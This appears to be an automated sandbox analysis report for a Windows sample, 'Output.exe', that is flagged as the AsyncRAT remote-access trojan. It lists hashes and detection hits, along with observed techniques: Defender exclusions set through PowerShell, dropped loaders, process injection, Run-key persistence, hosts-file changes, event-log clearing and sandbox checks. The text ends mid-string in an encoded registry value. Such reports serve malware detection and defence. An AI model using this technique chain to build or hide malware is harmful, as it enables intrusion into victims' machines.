Analysis
-
max time kernel
83s -
max time network
83s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 07:14
Static task
static1
Behavioral task
behavioral1
Sample
Output.exe
Resource
win10v2004-20241007-en
General
-
Target
Output.exe
-
Size
3.0MB
-
MD5
8c33199388f8894532909836f3f4d3e1
-
SHA1
11bdbb98163accd6bfac16585062fd573e5b5a48
-
SHA256
8930244d360f2da7f1b4dad68a59d5d768e78b4256da9751055ee541d45da616
-
SHA512
e0a3603e257196332b494ed88b86237194a2b6c99722f141d727e0ecf7a86fb88c6bd717bfa36a1f4adfa6c6bffcde46f1057c50dee9ba89e9b7eecd673ef026
-
SSDEEP
98304:Y9unatJkJ46aQ86+LH8w5j3ylWtx8vKipHK9w3Dor:Ra3A8DLcgyWyvnFK9wzo
Malware Config
Signatures
-
Asyncrat family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/4512-124-0x000000001C570000-0x000000001C5A6000-memory.dmp family_asyncrat behavioral1/memory/4512-125-0x000000001C5A0000-0x000000001C5D2000-memory.dmp family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4220 powershell.exe 3572 powershell.exe 1740 powershell.exe 1904 powershell.exe 4556 powershell.exe 3412 powershell.exe 2892 powershell.exe 1244 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts Api-Injecter.exe File created C:\Windows\system32\drivers\etc\hosts uhmlgtreufhe.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Output.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Api-loader.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Api-Updater.exe -
Executes dropped EXE 7 IoCs
pid Process 4512 Api-Updater.exe 3392 Api-loader.exe 1484 Shadow-Spoofer.exe 2100 Api-Injecter.exe 1724 uhmlgtreufhe.exe 5760 Api-Updater.exe 5824 Api-loader.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GsjJjnxnnax Api-Updater.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\MRT.exe Api-Injecter.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe uhmlgtreufhe.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2100 set thread context of 4764 2100 Api-Injecter.exe 121 PID 1724 set thread context of 4648 1724 uhmlgtreufhe.exe 149 PID 1724 set thread context of 4352 1724 uhmlgtreufhe.exe 150 PID 1724 set thread context of 1220 1724 uhmlgtreufhe.exe 151 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Api-Injecter.exe Api-loader.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3032 sc.exe 220 sc.exe 3172 sc.exe 3716 sc.exe 3676 sc.exe 4848 sc.exe 3728 sc.exe 4768 sc.exe 3728 sc.exe 1912 sc.exe 1580 sc.exe 1732 sc.exe 2328 sc.exe 2432 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Shadow-Spoofer.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 58 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02skkmmrbqqmyxle\DeviceId = "<Data><User username=\"02SKKMMRBQQMYXLE\"><HardwareInfo BoundTime=\"1733555723\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02cxaobyoycdgrkd\AppIdList svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02skkmmrbqqmyxle svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02skkmmrbqqmyxle\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02skkmmrbqqmyxle\DeviceId = "<Data><User username=\"02SKKMMRBQQMYXLE\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02cxaobyoycdgrkd\Reason = "2147780641" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02cxaobyoycdgrkd svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\ValidDeviceId = "02skkmmrbqqmyxle" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02cxaobyoycdgrkd\Response Saturday, December 07, 2024 07:15:21 = "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" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02cxaobyoycdgrkd\Request Saturday, December 07, 2024 07:15:21 = "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